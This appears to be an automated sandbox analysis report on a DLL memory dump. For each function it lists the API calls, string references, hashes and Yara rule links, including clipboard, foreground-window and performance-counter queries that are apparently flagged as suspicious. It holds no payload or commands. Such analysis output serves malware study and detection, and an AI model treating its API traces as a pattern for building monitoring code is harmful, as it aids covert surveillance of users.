Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID: @Mt
API String ID: 2744216297-1491384996
Opcode ID: 60c2d09bcc317e2a8fa6e7255305bdb638b62c52949b559274c5414bd56abbce
Instruction ID: 6955ba3b2289282d38eb5c50636a8e3ecb465f9717931a921e21898864a75bfe
Opcode Fuzzy Hash: 60c2d09bcc317e2a8fa6e7255305bdb638b62c52949b559274c5414bd56abbce
Instruction Fuzzy Hash: 5DF01C36020635BBCF225FD1CC0898A3F66EF4A3A4B248415FA0CE9220C73288A5DBD4

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2DE6C, Relevance: 7.7, APIs: 5, Instructions: 200COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6EA2DEF0
__alloca_probe_16.LIBCMT ref: 6EA2DFB6
__freea.LIBCMT ref: 6EA2E022

Part of subcall function 6EA2828C: RtlAllocateHeap.NTDLL(00000000,?,?,?,6EA17EB3,?,?,24448D6E,00000000,?,6EA01717,?,?,?), ref: 6EA282BE

__freea.LIBCMT ref: 6EA2E02B
__freea.LIBCMT ref: 6EA2E050

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 4fe9ae9ab993331d468d35275afee976025aeb6f396400b61e52e0cf196575c7
Instruction ID: 63b124a642523c53dec03ae09e213a42c74caf1d03d9273c1c4ee501f394d387
Opcode Fuzzy Hash: 4fe9ae9ab993331d468d35275afee976025aeb6f396400b61e52e0cf196575c7
Instruction Fuzzy Hash: 5251C072544216AFEB118EE58C40EAB36E9DF85758F2E4539FC14BB140EB31DCD18AAC

Uniqueness

Uniqueness Score: -1.00%

Function 6EA05CE0, Relevance: 7.7, APIs: 5, Instructions: 160threadclipboardCOMMON

Download Yara Rule

APIs

GetThreadErrorMode.KERNEL32(74E04D10,0000001D,00000000,0000001D,?,6EA05C67,74E04D10,00000033,?,00000000,00000000,0000005F,00000000,00000002,74E00DE0), ref: 6EA05D00
GetClipboardSequenceNumber.USER32(?,6EA05C67,74E04D10,00000033,?,00000000,00000000,0000005F,00000000,00000002,74E00DE0), ref: 6EA05D0F

Part of subcall function 6EA05AB0: GetClipboardSequenceNumber.USER32(74E04D10,00000033,?,00000000,00000000,0000005F,00000000,00000002,74E00DE0), ref: 6EA05AC1

Part of subcall function 6EA05AB0: GetActiveWindow.USER32 ref: 6EA05BE7
Part of subcall function 6EA05AB0: GetTickCount.KERNEL32 ref: 6EA05C20
Part of subcall function 6EA05AB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6EA05CAA

GetActiveWindow.USER32 ref: 6EA05E35
GetTickCount.KERNEL32 ref: 6EA05E66
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6EA05EF3

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ActiveClipboardCountNumberSequenceTickUnothrow_t@std@@@Window__ehfuncinfo$??2@$ErrorModeThread
String ID:
API String ID: 1223628243-0
Opcode ID: 5c1a38455cbabf31bdcb809836ed0265641693fff175d016d99dfb82c6f09cbd
Instruction ID: ba81650c55bafc90a082eba6400064702a60048d2ceb47048ce3b25d60a70b5c
Opcode Fuzzy Hash: 5c1a38455cbabf31bdcb809836ed0265641693fff175d016d99dfb82c6f09cbd
Instruction Fuzzy Hash: E6517F31D347144BD72393B2E14515EA29A5F9B28CF28CF23F401FB161FF2558D24945

Uniqueness

Uniqueness Score: -1.00%

Function 6EA13460, Relevance: 7.6, APIs: 5, Instructions: 148COMMON

Download Yara Rule

APIs

PdhRemoveCounter.PDH(?,065D8F34,?,?,00000000,6EA390E0,000000FF,?,6EA1083E,00000000), ref: 6EA134A4
PdhCloseQuery.PDH(?,065D8F34,?,?,00000000,6EA390E0,000000FF,?,6EA1083E,00000000), ref: 6EA134BA
PdhOpenQueryW.PDH(00000000,00000000,00000000), ref: 6EA134E4
PdhValidatePathW.PDH(?), ref: 6EA13547
PdhAddCounterW.PDH(00000000,?,00000000,?), ref: 6EA1356E

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CounterQuery$CloseOpenPathRemoveValidate
String ID:
API String ID: 698537007-0
Opcode ID: e635f788bbea4fe9413b33e52d26f02d561694f18963b46067af51b58291908c
Instruction ID: 5649824b094911ca7f296f39a20af0930829afc76351d059175c36e96adb6538
Opcode Fuzzy Hash: e635f788bbea4fe9413b33e52d26f02d561694f18963b46067af51b58291908c
Instruction Fuzzy Hash: 9851AC71904659ABDB20CF94CD44BDAF3B8FF40310F0186A5E568EB650DB74AAC4CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA121E0, Relevance: 7.6, APIs: 5, Instructions: 77threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6EA4CA58), ref: 6EA121EC
GetCurrentThreadId.KERNEL32 ref: 6EA121FC
LeaveCriticalSection.KERNEL32(6EA4CA58), ref: 6EA12219
LeaveCriticalSection.KERNEL32(6EA4CA58), ref: 6EA1223D
SetWindowLongW.USER32 ref: 6EA12289

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$CurrentEnterLongThreadWindow
String ID:
API String ID: 4199534935-0
Opcode ID: cbf5a9764ae12ccaafbaedde0b7b104975e5106bfe167e11037dc2f925814208
Instruction ID: 9d4f4a0333d5cd647f8fc510e939a5b300ba769deb29e85cf51fc261ba2a2369
Opcode Fuzzy Hash: cbf5a9764ae12ccaafbaedde0b7b104975e5106bfe167e11037dc2f925814208
Instruction Fuzzy Hash: 3621A4726086219B9B209FE5EC0898B7BAAFF87360305C529F849DB600DB30D891D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 6EA15A5C, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6EA15A6D

Part of subcall function 6EA02040: std::_Lockit::_Lockit.LIBCPMT ref: 6EA0205D
Part of subcall function 6EA02040: std::_Lockit::~_Lockit.LIBCPMT ref: 6EA02079

codecvt.LIBCPMT ref: 6EA15AA7
std::_Facet_Register.LIBCPMT ref: 6EA15ABE
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA15ADE
Concurrency::cancel_current_task.LIBCPMT ref: 6EA15AEB

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercodecvt
String ID:
API String ID: 3595785899-0
Opcode ID: dc6934984b1f0f32540637ff9f968cebfb66d53879743351fa8f5897dade9a3e
Instruction ID: e1e9a0da41b43dd88b8d3b7f91c037640c2e420b896381877b67c95343588142
Opcode Fuzzy Hash: dc6934984b1f0f32540637ff9f968cebfb66d53879743351fa8f5897dade9a3e
Instruction Fuzzy Hash: BC01D671908619CBCB01EBE4C9546FEB7BAAF84718F244809D811AB2C0CF349E81CF98

Uniqueness

Uniqueness Score: -1.00%

Function 6EA337CE, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA337E6

Part of subcall function 6EA28252: HeapFree.KERNEL32(00000000,00000000,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?), ref: 6EA28268
Part of subcall function 6EA28252: GetLastError.KERNEL32(?,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?,?), ref: 6EA2827A

_free.LIBCMT ref: 6EA337F8
_free.LIBCMT ref: 6EA3380A
_free.LIBCMT ref: 6EA3381C
_free.LIBCMT ref: 6EA3382E

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ada32af28a7c4ff63561b6bd38dfe35b1629af14999c3ee6fcd8a49ad1295331
Instruction ID: 2345dc9490290a3069a5a77ae4934edf01b03d7073a450b9994c710e689059e3
Opcode Fuzzy Hash: ada32af28a7c4ff63561b6bd38dfe35b1629af14999c3ee6fcd8a49ad1295331
Instruction Fuzzy Hash: A4F04471504A159B8A55DAD8D589C4A73EDFE807143698C25F07CEB940C725FCC486A8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1ED27, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 498COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6EA1F036

Strings

:, xrefs: 6EA1EDCE
A, xrefs: 6EA1EDDD
Z, xrefs: 6EA1EDE4

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldvrm
String ID: :$A$Z
API String ID: 1302938615-166580712
Opcode ID: 9e41f81d9d391f8188fe1a3aef49e763cfda8d2cdbc5ab3d0ee754379a95d00f
Instruction ID: d2cc13cd65178c95da6c28c321adb39354c1b9013ed83b0029f4c4f91f13ca34
Opcode Fuzzy Hash: 9e41f81d9d391f8188fe1a3aef49e763cfda8d2cdbc5ab3d0ee754379a95d00f
Instruction Fuzzy Hash: E2F1E87C51C1869AFB10CFEAD8946D8B3F2AF40714BF8852AD9247B685D7308FC98719

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2B82F, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA2B9C9

Strings

*?, xrefs: 6EA2B872

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 8ae66dc61bb2168d8491c6587d8b0c185cba3f0793e3a00eca5a6c596119b6cb
Instruction ID: e9c1b0ac180b2f1780c4ea024b91273a5f5cf3e828295989cd053bee063bca75
Opcode Fuzzy Hash: 8ae66dc61bb2168d8491c6587d8b0c185cba3f0793e3a00eca5a6c596119b6cb
Instruction Fuzzy Hash: 99613875E042199FDB14CFA9C8805EDFBF9EF48310B28866AD814F7308D731AE818B94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2ECF0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 178fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6EA2E483: GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6EA2E4CB

WriteFile.KERNEL32(?,00000000,6EA26918,?,00000000,?,?,?,6EA2685B,?,00000000,00000000,6EA4A338,0000002C,6EA26918,?), ref: 6EA2EE41
GetLastError.KERNEL32 ref: 6EA2EE4B
__dosmaperr.LIBCMT ref: 6EA2EE90

Strings

@Mt, xrefs: 6EA2EE4B

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID: @Mt
API String ID: 251514795-1491384996
Opcode ID: c0ba0938fd968babe6b072576e4682cb13d6c6902b65025ce0ab2657e79fae2d
Instruction ID: 2a3b622ead2906f75340bba7e9fb8296d1a98e7b7ef792e5044711bcfc70de65
Opcode Fuzzy Hash: c0ba0938fd968babe6b072576e4682cb13d6c6902b65025ce0ab2657e79fae2d
Instruction Fuzzy Hash: CA51A17190021AAFDB129BF4C980BEEBBB9EF06318F0C9865E410BB150D7319DC1C769

Uniqueness

Uniqueness Score: -1.00%

Function 6EA022D0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6EA0244F

Part of subcall function 6EA1838E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,24448D6E,6EA152C0,?,6EA49E54,?,?,?,24448D6E), ref: 6EA183EE

Strings

ios_base::badbit set, xrefs: 6EA023E7, 6EA02412, 6EA02433
t, xrefs: 6EA023B0
ios_base::failbit set, xrefs: 6EA022E5

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set$t
API String ID: 3109751735-3135341975
Opcode ID: 517c7c1360ed3534b3f8339b9021589412f4710c77c1153d91effaf354fcf17b
Instruction ID: 7fc50e8dc22f80f39028172137efbdad537f32fe7a13f626a0cb643c6b21bf49
Opcode Fuzzy Hash: 517c7c1360ed3534b3f8339b9021589412f4710c77c1153d91effaf354fcf17b
Instruction Fuzzy Hash: B741F6B1504319AFDB04CF98D840BDEB7BCEF45324F14861AE514E7781D771A984CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2DBB5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA2DCCA

Part of subcall function 6EA2DAD4: __alloca_probe_16.LIBCMT ref: 6EA2DB27
Part of subcall function 6EA2DAD4: __freea.LIBCMT ref: 6EA2DB89

_free.LIBCMT ref: 6EA2DC20

Part of subcall function 6EA28252: HeapFree.KERNEL32(00000000,00000000,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?), ref: 6EA28268
Part of subcall function 6EA28252: GetLastError.KERNEL32(?,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?,?), ref: 6EA2827A

GetLastError.KERNEL32(?,?,?,?,00000000), ref: 6EA2DC5B

Part of subcall function 6EA2B406: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6EA28B1E,00000001,00000364,00000008,000000FF,?,6EA17EB3,?,?,24448D6E,00000000), ref: 6EA2B447

Strings

@Mt, xrefs: 6EA2DC5B

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHeapLast_free$AllocateFree__alloca_probe_16__freea
String ID: @Mt
API String ID: 948322168-1491384996
Opcode ID: 881821adcad4c6cc3e355d97342fa22da4994ff8ed615e3cca5cc4b367ca7d34
Instruction ID: f436574bef14611d6b06c03f43afaab7189c8989e043fb94b4e6b00d0138e044
Opcode Fuzzy Hash: 881821adcad4c6cc3e355d97342fa22da4994ff8ed615e3cca5cc4b367ca7d34
Instruction Fuzzy Hash: 4941A071904525AFDF218EA98D40F9A7BBDEF45310F0848A5F908F6141EB71CD80CF65

Uniqueness

Uniqueness Score: -1.00%

Function 6EA07980, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6EA079AF
__aullrem.LIBCMT ref: 6EA079E0
FlushProcessWriteBuffers.KERNEL32(065D8F34,00000000,0000005F,00000000,?,05AF0528,00000000,00000002,74E00DE0), ref: 6EA07A0E

Strings

t, xrefs: 6EA07A14, 6EA079FB

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffersFlushProcessWrite__aulldiv__aullrem
String ID: t
API String ID: 3129485293-4046888548
Opcode ID: 41a384f7a4f6a93567a01db921aaf7983077409740594ce43f46020b3890a847
Instruction ID: 850235936caca7430c32b998437ed3d6b9253ffface7a33be87c1144456828e6
Opcode Fuzzy Hash: 41a384f7a4f6a93567a01db921aaf7983077409740594ce43f46020b3890a847
Instruction Fuzzy Hash: 99114C317002086FF708A9AD6D41BBB729EC7C8709F564939F90ACB3C0EA20DC4442A8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2E295, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,6EA2E1CB,?,6EA4A640,0000000C,6EA2E273,?,?,?), ref: 6EA2E2EB
GetLastError.KERNEL32(?,6EA2E1CB,?,6EA4A640,0000000C,6EA2E273,?,?,?), ref: 6EA2E2F5
__dosmaperr.LIBCMT ref: 6EA2E320

Strings

@Mt, xrefs: 6EA2E2F5

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: @Mt
API String ID: 2583163307-1491384996
Opcode ID: 41333a013f15a5161c1211770a511491e902ec31a2dd2f3966079cc67295d74e
Instruction ID: de6ca919309b11c3c9cadeff7a444cedc6c4eb2b02b3c9d561fb1422d2576ee8
Opcode Fuzzy Hash: 41333a013f15a5161c1211770a511491e902ec31a2dd2f3966079cc67295d74e
Instruction Fuzzy Hash: A40148336046304ECA5652F899647AD675D8B83B38F3E8639E829FB1C1CB659CC18299

Uniqueness

Uniqueness Score: -1.00%

Function 6EA30381, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,00000001,6EA26918,6EA26918,?,6EA30430,?,?,00000002,00000000), ref: 6EA303BA
GetLastError.KERNEL32(?,6EA30430,?,?,00000002,00000000,?,6EA2ED79,00000001,00000000,00000000,00000002,?,?,?,6EA2685B), ref: 6EA303C4
__dosmaperr.LIBCMT ref: 6EA303CB

Strings

@Mt, xrefs: 6EA303C4

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID: @Mt
API String ID: 2336955059-1491384996
Opcode ID: 31d57b1f7830f285b44c42e09ded678fe33a2c8e1973999a065ed9bc013b3cf7
Instruction ID: 7d69c08635ac41d53cb5c9ff27e20bbb0f76e23f0cd3e2505bccf3880288fcaa
Opcode Fuzzy Hash: 31d57b1f7830f285b44c42e09ded678fe33a2c8e1973999a065ed9bc013b3cf7
Instruction Fuzzy Hash: 1601D832620635AFCF058FD9CC44C9E7B29DB86320B380259F854EB180FB71DD828798

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2BF02, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6EA2BF27
GetLastError.KERNEL32 ref: 6EA2BF31
__dosmaperr.LIBCMT ref: 6EA2BF38

Strings

@Mt, xrefs: 6EA2BF31

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastModuleName__dosmaperr
String ID: @Mt
API String ID: 4076908705-1491384996
Opcode ID: d2195c52ec8c56dbcaa400ac4c3c39c101fa70458cef0ebee6899f6552ad950c
Instruction ID: 27c86b7a6160b1ebb825db73a08a30625c2580f31cea23fda680fe7a38590d2a
Opcode Fuzzy Hash: d2195c52ec8c56dbcaa400ac4c3c39c101fa70458cef0ebee6899f6552ad950c
Instruction Fuzzy Hash: 1F110C7194421CAFDF60DFA8DC88BDA77B8EB58304F1445E9E50DE7240DB709A858F58

Uniqueness

Uniqueness Score: -1.00%

Function 6EA19B5E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6EA18B45), ref: 6EA19B6C
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EA19B7A
SetLastError.KERNEL32(00000000,?,6EA18B45), ref: 6EA19B83

Strings

@Mt, xrefs: 6EA19B6C

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$Value___vcrt_
String ID: @Mt
API String ID: 483936075-1491384996
Opcode ID: a8d1cabd8d44c424767882c76315d9e3359ceea84c48eb807867d06cffbabd82
Instruction ID: dd5b54dbae253606d791d1beef2e7fb3c24dd8fe97d2a5b33ea4b43b73c74e54
Opcode Fuzzy Hash: a8d1cabd8d44c424767882c76315d9e3359ceea84c48eb807867d06cffbabd82
Instruction Fuzzy Hash: E0D0C232229A22978E102AB9ED0C8D536ABE7C327A3068731E014DA094D734944BA650

Uniqueness

Uniqueness Score: -1.00%

Function 6EA28C8A, Relevance: 6.3, APIs: 4, Instructions: 321COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6EA28D11

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c6eeac3a0afb6fc0eee6d046547c1b18ec6dde7edbe5f8b8ae7182ce1f33a42d
Instruction ID: e4271219621874ab18998f8dd6a10e03a57c82b87d9f85790629a09d0e61799c
Opcode Fuzzy Hash: c6eeac3a0afb6fc0eee6d046547c1b18ec6dde7edbe5f8b8ae7182ce1f33a42d
Instruction Fuzzy Hash: F9B104329042569FEB01CFA8C8907EEBBF6EF55340F2C45BAF854AB241D6348D81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 6EA19BE3, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6EA19CAA
___AdjustPointer.LIBCMT ref: 6EA19CCD
___AdjustPointer.LIBCMT ref: 6EA19D69

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 2a0456263e34e748d0e2552faab976eabdc04f9cd93546487f28dd4e42b84d76
Instruction ID: 0c7c356b6259e369fb2d0bbaa64445ac986fa91b718b74f11ef982fa8d92d388
Opcode Fuzzy Hash: 2a0456263e34e748d0e2552faab976eabdc04f9cd93546487f28dd4e42b84d76
Instruction Fuzzy Hash: A751017260C6029FEB168FD5CA50BEA7BB9EF05314F24052DE8558B294E731ECC1CB98

Uniqueness

Uniqueness Score: -1.00%

Function 6EA05AB0, Relevance: 6.2, APIs: 4, Instructions: 155clipboardCOMMON

Download Yara Rule

APIs

GetClipboardSequenceNumber.USER32(74E04D10,00000033,?,00000000,00000000,0000005F,00000000,00000002,74E00DE0), ref: 6EA05AC1

Part of subcall function 6EA05F40: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6EA05F6A
Part of subcall function 6EA05F40: GetOEMCP.KERNEL32(00000000,?,0000004E,00000002,0000006F,?,0000004E,00000000,?,?,00000000,00000000,0000005F,00000000,00000002,74E00DE0), ref: 6EA05FD1
Part of subcall function 6EA05F40: GetForegroundWindow.USER32(?,0000004E,00000002,0000006F,?,0000004E,00000000,?,?,00000000,00000000,0000005F), ref: 6EA06043

GetActiveWindow.USER32 ref: 6EA05BE7
GetTickCount.KERNEL32 ref: 6EA05C20
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6EA05CAA

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

